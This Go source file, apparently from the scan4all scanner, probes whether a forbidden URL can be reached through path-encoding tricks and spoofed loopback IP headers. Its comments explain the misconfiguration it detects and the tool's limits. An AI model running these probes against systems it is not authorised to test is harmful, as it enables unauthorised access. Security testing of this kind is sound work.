bypass403.go
package brute
import (
"context"
"github.com/hktalent/scan4all/lib/util"
"net/http"
"regexp"
"strings"
"sync"
"time"
)
var (
	// reURL matches a target that already begins with an http:// or https://
	// scheme (lower-case only; the pattern is case-sensitive).
	reURL = regexp.MustCompile(`^https?://`)

	// headerPayloads lists the request header names that ByPass403 probes, one
	// per request, each sent with headerValue. All of them are supplied by the
	// client, so a server whose access decision changes when one is present is
	// trusting caller-controlled data; such headers should only be honoured
	// when a trusted proxy sets them and should be stripped from inbound
	// requests otherwise.
	headerPayloads = []string{
		"X-Custom-IP-Authorization",
		"X-Originating-IP",
		"X-Forwarded-For",
		"X-Remote-IP",
		"X-Client-IP",
		"X-Host",
		"X-Forwarded-Host",
		"X-ProxyUser-Ip",
		"X-Remote-Addr",
	}
)

// headerValue is the value sent with every name in headerPayloads: the IPv4
// loopback address.
const headerValue string = "127.0.0.1"
// Result403 is the outcome of a single probe sent by PenetrateEndpoint.
type Result403 struct {
	// Url is the URL the probe requested. Header-based probes all carry the
	// same unmodified URL; the header name is not recorded here.
	Url string
	// Ok is true only when the response status code was 200.
	Ok bool
	// Err holds the request-construction or transport error, if any; it is
	// nil whenever a response was received.
	Err error
}
// getValidDomain trims surrounding whitespace from domain and, when the result
// does not already start with http:// or https:// (per reURL), prefixes it
// with "https://". No other validation is performed, and a trailing slash on
// the input is kept as-is.
func getValidDomain(domain string) string {
	target := strings.TrimSpace(domain)
	if reURL.MatchString(target) {
		return target
	}
	return "https://" + target
}
// constructEndpointPayloads returns the 13 URL variants of domain/path that
// ByPass403 requests. Every variant spells the same resource differently
// (upper-casing, extra slashes, "." and ".." segments, ";" path parameters,
// "%2e" and double-encoded "%252e" dots, and "%ef%bc%8f", the UTF-8 encoding
// of the fullwidth solidus), so a 200 on one of them while the plain path is
// forbidden indicates that the layer enforcing access control and the layer
// serving the resource normalise paths differently.
//
// domain and path are concatenated verbatim: nothing is escaped, and a
// leading slash on path or a trailing slash on domain yields extra slashes.
func constructEndpointPayloads(domain, path string) []string {
	// {prefix, suffix} pairs placed around the unmodified path, in output order.
	wrappers := [...][2]string{
		{"/", "/"},
		{"/", "/."},
		{"//", "//"},
		{"/./", "/./"},
		{"/./", "/.."},
		{"/;/", ""},
		{"/.;/", ""},
		{"//;//", ""},
		{"/", "..;/"},
		{"/%2e/", ""},
		{"/%252e/", ""},
		{"/%ef%bc%8f", ""},
	}

	out := make([]string, 0, len(wrappers)+1)
	// The upper-cased form is the only variant that rewrites the path itself.
	out = append(out, domain+"/"+strings.ToUpper(path))
	for _, w := range wrappers {
		out = append(out, domain+w[0]+path+w[1])
	}
	return out
}
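// PenetrateEndpoint sends one GET request to url and reports the outcome on
// rst.
//
// When at least one header name is passed, the first one is set on the request
// with the value headerValue; any further names are ignored. Exactly one
// Result403 is sent on rst per call, and wg.Done is called when the function
// returns, so the caller must have called wg.Add(1) beforehand and rst must be
// buffered or have a reader, otherwise the send blocks.
//
// The request is bounded by a 20-second timeout derived from util.Ctx_global.
// Ok is true only when the final response status is exactly 200; Err is set
// only when building or sending the request failed.
func PenetrateEndpoint(wg *sync.WaitGroup, url string, rst chan Result403, header ...string) {
	ctx, cancel := context.WithTimeout(util.Ctx_global, 20*time.Second)
	defer func() {
		cancel()
		wg.Done()
	}()

	req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
	if err != nil {
		rst <- Result403{Ok: false, Url: url, Err: err}
		return
	}

	// Test the length rather than nil: a caller that spreads an empty but
	// non-nil slice (names...) would otherwise panic on header[0].
	if len(header) > 0 {
		req.Header.Set(header[0], headerValue)
	}

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		rst <- Result403{Ok: false, Url: url, Err: err}
		return
	}
	defer resp.Body.Close()

	// NOTE(review): http.DefaultClient follows redirects, so a 200 reached via
	// a redirect (for example to a login page) is counted as a hit, and a
	// status code alone does not show that the protected content was served.
	// Treat Ok as a lead to verify, e.g. by comparing the body with the
	// baseline response, not as a confirmed finding.
	rst <- Result403{Ok: resp.StatusCode == http.StatusOK, Url: url}
}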
// ByPass403 checks whether access control on domain/path depends on how the
// request is spelled. It requests every URL variant produced by
// constructEndpointPayloads, plus the unmodified URL once per name in
// headerPayloads, all concurrently, and returns the URLs of the probes that
// answered with status 200. The returned slice is empty (never nil) when no
// probe succeeded.
//
// wg is incremented once per probe and each probe calls wg.Done; this function
// itself returns after it has received one result per probe. domain and path
// are dereferenced without a nil check.
//
// NOTE(review): no baseline request is made for the plain URL, so if it
// already returns 200 every header probe is reported. Header probes also all
// report the same unmodified URL, so the result does not say which header
// produced the hit.
func ByPass403(domain, path *string, wg *sync.WaitGroup) []string {
	base := getValidDomain(*domain)
	target := strings.TrimSpace(*path)
	urls := constructEndpointPayloads(base, target)

	// One result is expected per probe; the buffer lets every goroutine send
	// without waiting for the collector below.
	total := len(urls) + len(headerPayloads)
	results := make(chan Result403, total)
	wg.Add(total)

	for _, u := range urls {
		go PenetrateEndpoint(wg, u, results)
	}
	plain := base + "/" + target
	for _, name := range headerPayloads {
		go PenetrateEndpoint(wg, plain, results, name)
	}

	hits := []string{}
	for received := 0; received < total; received++ {
		if r := <-results; r.Ok {
			hits = append(hits, r.Url)
		}
	}
	return hits
}